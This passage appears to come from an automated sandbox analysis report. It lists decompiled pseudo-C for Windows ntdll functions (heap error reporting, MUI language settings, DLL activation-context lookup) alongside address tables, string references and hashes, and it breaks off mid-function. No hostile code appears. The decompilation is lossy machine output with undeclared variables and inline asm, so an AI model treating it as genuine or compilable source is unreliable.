                                                                      0x01291d79
                                                                      0x01291d98
                                                                      0x01291d99
                                                                      0x01291d7b
                                                                      0x01291d90
                                                                      0x01291d95
                                                                      0x01291daa
                                                                      0x01291db0
                                                                      0x01291db1
                                                                      0x01291db7
                                                                      0x01291dc2
                                                                      0x01291de1
                                                                      0x01291de2
                                                                      0x01291dc4
                                                                      0x01291dd9
                                                                      0x01291dde
                                                                      0x01291df3
                                                                      0x01291df9
                                                                      0x01291dfa
                                                                      0x01291e00
                                                                      0x01291e0a
                                                                      0x01291e13
                                                                      0x01291e32
                                                                      0x01291e33
                                                                      0x01291e15
                                                                      0x01291e2a
                                                                      0x01291e2f
                                                                      0x01291e39
                                                                      0x01291e4a
                                                                      0x01291e02
                                                                      0x01291e02
                                                                      0x01291e08
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01291e08
                                                                      0x01291e5b
                                                                      0x01291e7a
                                                                      0x01291e7b
                                                                      0x01291e5d
                                                                      0x01291e72
                                                                      0x01291e77
                                                                      0x01291e95

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                      • API String ID: 0-2897834094
                                                                      • Opcode ID: 599b2d9868033927155705ec6805fbae7fdb3e47d3d27b15cce967051031ed4c
                                                                      • Instruction ID: c8a33e47728d03a0ac7dbcc67b899619806a013df72d7f6c9d486e3c979eab95
                                                                      • Opcode Fuzzy Hash: 599b2d9868033927155705ec6805fbae7fdb3e47d3d27b15cce967051031ed4c
                                                                      • Instruction Fuzzy Hash: 1061E736536183DFDB19A75EE589E2177F4EB20D31B0D802DF60A6B304D764A890CB1E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011E3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 96%
                                                                      			E011E3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E011E1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E011E1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E011E1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E011E1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E011E1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L011F4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0121F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01221370(_t276, 0x11b4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0121BB40(0,  &_v68, _t170);
									if(L011E43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0121BB40(_t257,  &_v68, _t243);
								if(L011E43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01221370(_t278, 0x11b4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L011F4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0121F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01221370(_v16, 0x11b4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0121BB40(_t262,  &_v68, _t244);
								if(L011E43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01221370(_t282, 0x11b4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0121BB40(_t262,  &_v68, _t201);
							if(L011E43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L011F4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0121F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01221370(_t280, 0x11b4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0121BB40(_t267,  &_v68, _t245);
							if(L011E43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01221370(_t284, 0x11b4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0121BB40(_t267,  &_v68, _t224);
						if(L011E43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                      0x011e3d3c
                                                                      0x011e3d42
                                                                      0x011e3d44
                                                                      0x011e3d46
                                                                      0x011e3d49
                                                                      0x011e3d4c
                                                                      0x011e3d4f
                                                                      0x011e3d52
                                                                      0x011e3d55
                                                                      0x011e3d58
                                                                      0x011e3d5b
                                                                      0x011e3d5f
                                                                      0x011e3d61
                                                                      0x011e3d66
                                                                      0x01238213
                                                                      0x01238218
                                                                      0x011e4085
                                                                      0x011e4088
                                                                      0x011e408e
                                                                      0x011e4094
                                                                      0x011e409a
                                                                      0x011e40a0
                                                                      0x011e40a6
                                                                      0x011e40a9
                                                                      0x011e40af
                                                                      0x011e40b6
                                                                      0x011e40bd
                                                                      0x011e40bd
                                                                      0x011e3d83
                                                                      0x0123821f
                                                                      0x01238229
                                                                      0x01238238
                                                                      0x01238238
                                                                      0x0123823d
                                                                      0x0123823d
                                                                      0x011e3da0
                                                                      0x011e3daf
                                                                      0x011e3db5
                                                                      0x011e3dba
                                                                      0x011e3dba
                                                                      0x011e3dd4
                                                                      0x011e3e94
                                                                      0x011e3eab
                                                                      0x011e3f6d
                                                                      0x011e3f84
                                                                      0x011e406b
                                                                      0x011e406b
                                                                      0x011e406e
                                                                      0x011e406e
                                                                      0x011e4070
                                                                      0x011e4074
                                                                      0x01238351
                                                                      0x01238351
                                                                      0x011e407a
                                                                      0x011e407f
                                                                      0x0123835d
                                                                      0x01238370
                                                                      0x01238377
                                                                      0x01238379
                                                                      0x0123837c
                                                                      0x0123837c
                                                                      0x0123835d
                                                                      0x00000000
                                                                      0x011e407f
                                                                      0x011e3f8a
                                                                      0x011e3f8d
                                                                      0x011e3f90
                                                                      0x011e3f95
                                                                      0x0123830d
                                                                      0x0123830f
                                                                      0x011e3f9b
                                                                      0x011e3fac
                                                                      0x011e3fae
                                                                      0x011e3fb1
                                                                      0x011e3fb1
                                                                      0x011e3fb6
                                                                      0x01238317
                                                                      0x0123831a
                                                                      0x00000000
                                                                      0x011e3fbc
                                                                      0x011e3fc1
                                                                      0x011e3fc9
                                                                      0x011e3fd7
                                                                      0x011e3fda
                                                                      0x011e3fdd
                                                                      0x011e4021
                                                                      0x011e4021
                                                                      0x011e4029
                                                                      0x011e4030
                                                                      0x011e4044
                                                                      0x011e4046
                                                                      0x011e4046
                                                                      0x011e4044
                                                                      0x011e4049
                                                                      0x01238327
                                                                      0x01238334
                                                                      0x01238339
                                                                      0x0123833c
                                                                      0x011e404f
                                                                      0x011e404f
                                                                      0x011e404f
                                                                      0x011e4051
                                                                      0x011e4056
                                                                      0x011e4063
                                                                      0x011e4063
                                                                      0x011e4068
                                                                      0x00000000
                                                                      0x011e4068
                                                                      0x011e3fdf
                                                                      0x011e3fe2
                                                                      0x011e3fe4
                                                                      0x011e3fe7
                                                                      0x011e3fef
                                                                      0x011e4003
                                                                      0x011e4005
                                                                      0x011e4005
                                                                      0x011e400c
                                                                      0x011e4013
                                                                      0x011e4016
                                                                      0x011e4017
                                                                      0x011e401b
                                                                      0x011e401e
                                                                      0x00000000
                                                                      0x011e401e
                                                                      0x011e3fb6
                                                                      0x011e3eb1
                                                                      0x011e3eb4
                                                                      0x011e3eb7
                                                                      0x011e3ebc
                                                                      0x012382a9
                                                                      0x012382ab
                                                                      0x011e3ec2
                                                                      0x011e3ed3
                                                                      0x011e3ed5
                                                                      0x011e3ed8
                                                                      0x011e3ed8
                                                                      0x011e3edd
                                                                      0x012382b3
                                                                      0x012382b6
                                                                      0x00000000
                                                                      0x011e3ee3
                                                                      0x011e3ee8
                                                                      0x011e3eed
                                                                      0x011e3ef0
                                                                      0x011e3ef3
                                                                      0x011e3f02
                                                                      0x011e3f05
                                                                      0x011e3f08
                                                                      0x012382c0
                                                                      0x012382c3
                                                                      0x012382c5
                                                                      0x012382c8
                                                                      0x012382d0
                                                                      0x012382e4
                                                                      0x012382e6
                                                                      0x012382e6
                                                                      0x012382ed
                                                                      0x012382f4
                                                                      0x012382f7
                                                                      0x012382f8
                                                                      0x012382fc
                                                                      0x012382ff
                                                                      0x012382ff
                                                                      0x011e3f0e
                                                                      0x011e3f11
                                                                      0x011e3f16
                                                                      0x011e3f1d
                                                                      0x011e3f31
                                                                      0x01238307
                                                                      0x01238307
                                                                      0x011e3f31
                                                                      0x011e3f39
                                                                      0x011e3f48
                                                                      0x011e3f4d
                                                                      0x011e3f50
                                                                      0x011e3f50
                                                                      0x011e3f53
                                                                      0x011e3f58
                                                                      0x011e3f65
                                                                      0x011e3f65
                                                                      0x011e3f6a
                                                                      0x00000000
                                                                      0x011e3f6a
                                                                      0x011e3edd
                                                                      0x011e3dda
                                                                      0x011e3ddd
                                                                      0x011e3de0
                                                                      0x011e3de5
                                                                      0x01238245
                                                                      0x011e3deb
                                                                      0x011e3df7
                                                                      0x011e3dfc
                                                                      0x011e3dfe
                                                                      0x011e3e01
                                                                      0x011e3e01
                                                                      0x011e3e06
                                                                      0x0123824d
                                                                      0x0123824f
                                                                      0x01238254
                                                                      0x00000000
                                                                      0x011e3e0c
                                                                      0x011e3e11
                                                                      0x011e3e16
                                                                      0x011e3e19
                                                                      0x011e3e29
                                                                      0x011e3e2c
                                                                      0x011e3e2f
                                                                      0x0123825c
                                                                      0x0123825f
                                                                      0x01238261
                                                                      0x01238264
                                                                      0x0123826c
                                                                      0x01238280
                                                                      0x01238282
                                                                      0x01238282
                                                                      0x01238289
                                                                      0x01238290
                                                                      0x01238293
                                                                      0x01238294
                                                                      0x01238298
                                                                      0x0123829b
                                                                      0x0123829b
                                                                      0x011e3e35
                                                                      0x011e3e38
                                                                      0x011e3e3d
                                                                      0x011e3e44
                                                                      0x011e3e58
                                                                      0x012382a3
                                                                      0x012382a3
                                                                      0x011e3e58
                                                                      0x011e3e60
                                                                      0x011e3e6f
                                                                      0x011e3e74
                                                                      0x011e3e77
                                                                      0x011e3e77
                                                                      0x011e3e7a
                                                                      0x011e3e7f
                                                                      0x011e3e8c
                                                                      0x011e3e8c
                                                                      0x011e3e91
                                                                      0x00000000
                                                                      0x011e3e91

                                                                      Strings
                                                                      • Kernel-MUI-Language-SKU, xrefs: 011E3F70
                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 011E3E97
                                                                      • Kernel-MUI-Language-Allowed, xrefs: 011E3DC0
                                                                      • Kernel-MUI-Number-Allowed, xrefs: 011E3D8C
                                                                      • WindowsExcludedProcs, xrefs: 011E3D6F
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                      • API String ID: 0-258546922
                                                                      • Opcode ID: 729dd1bd07d298ab3931279ab870b506761bd9a1da91313d0afe1aa8ac44f1bd
                                                                      • Instruction ID: b9ec8a02926faef518cbff5e21ef0a828689c902b06e702b95723639b88b01ce
                                                                      • Opcode Fuzzy Hash: 729dd1bd07d298ab3931279ab870b506761bd9a1da91313d0afe1aa8ac44f1bd
                                                                      • Instruction Fuzzy Hash: 8AF16C72D10619EBCB19DFD8C984AEEBBF9FF58650F15016AE905E7610E7309E01CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01208E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 44%
                                                                      			E01208E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x12cd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x12c8464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x12c5780 & 0x00000003) != 0) {
							E01255510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x12c5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0121B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x12c7984; // 0xc92ba8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x12c8464; // 0x74790110
					 *0x12cb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01209B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x12c5780 & 0x00000005) != 0) {
						_push(_t49);
						E01255510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                      0x01208e0f
                                                                      0x01208e16
                                                                      0x01208e19
                                                                      0x01208e1b
                                                                      0x01208e21
                                                                      0x01208e7f
                                                                      0x01208e85
                                                                      0x01249354
                                                                      0x0124936c
                                                                      0x01249371
                                                                      0x0124937b
                                                                      0x01249381
                                                                      0x01249381
                                                                      0x0124937b
                                                                      0x01208e9d
                                                                      0x01208e9d
                                                                      0x01208e29
                                                                      0x01208e2c
                                                                      0x01208e38
                                                                      0x01208e3e
                                                                      0x01208e43
                                                                      0x01208eb5
                                                                      0x01208eb9
                                                                      0x012492aa
                                                                      0x012492af
                                                                      0x012492e8
                                                                      0x012492e8
                                                                      0x012492af
                                                                      0x01208eb9
                                                                      0x01208e45
                                                                      0x01208e53
                                                                      0x01208e5b
                                                                      0x01208e5f
                                                                      0x01208e78
                                                                      0x01208e78
                                                                      0x01208e7d
                                                                      0x01208ec3
                                                                      0x01208ecd
                                                                      0x01208ed2
                                                                      0x01208ed2
                                                                      0x01208ec5
                                                                      0x01208ec5
                                                                      0x00000000
                                                                      0x01208e7d
                                                                      0x01208e67
                                                                      0x01208ea4
                                                                      0x0124931a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01249320
                                                                      0x01208ea4
                                                                      0x01208e70
                                                                      0x01249325
                                                                      0x01249340
                                                                      0x01249345
                                                                      0x01249345
                                                                      0x01208e76
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      Strings
                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 0124933B, 01249367
                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0124932A
                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 01249357
                                                                      • LdrpFindDllActivationContext, xrefs: 01249331, 0124935D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                      • API String ID: 0-3779518884
                                                                      • Opcode ID: 6fc59d8b3b49c4807a45e78a078d0b797291cca0ed8ba7b8df0a9ff922f278dc
                                                                      • Instruction ID: b4f6ea182deca743889ce0fb1bf727a78d745e9dd34601be201cc62f3228a971
                                                                      • Opcode Fuzzy Hash: 6fc59d8b3b49c4807a45e78a078d0b797291cca0ed8ba7b8df0a9ff922f278dc
                                                                      • Instruction Fuzzy Hash: 7341C821E203169FDB37AB1C988DB77BAA5AB09254F054369FB04571D3E7B0AD808781
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011E8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 83%
                                                                      			E011E8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E011E934A() != 0) {
								_t159 = E0125A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x12c5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01255510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x12c5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E011E849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E011E8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E011E8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x12c5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x12c5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E011F2280(_t92, 0x12c86cc);
															_t94 = E012A9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E012061A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x12c5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E011E8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x12c5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x12c5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0121F380(_t136, 0x11b1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E011F2280(_t108, 0x12c86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E012061A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
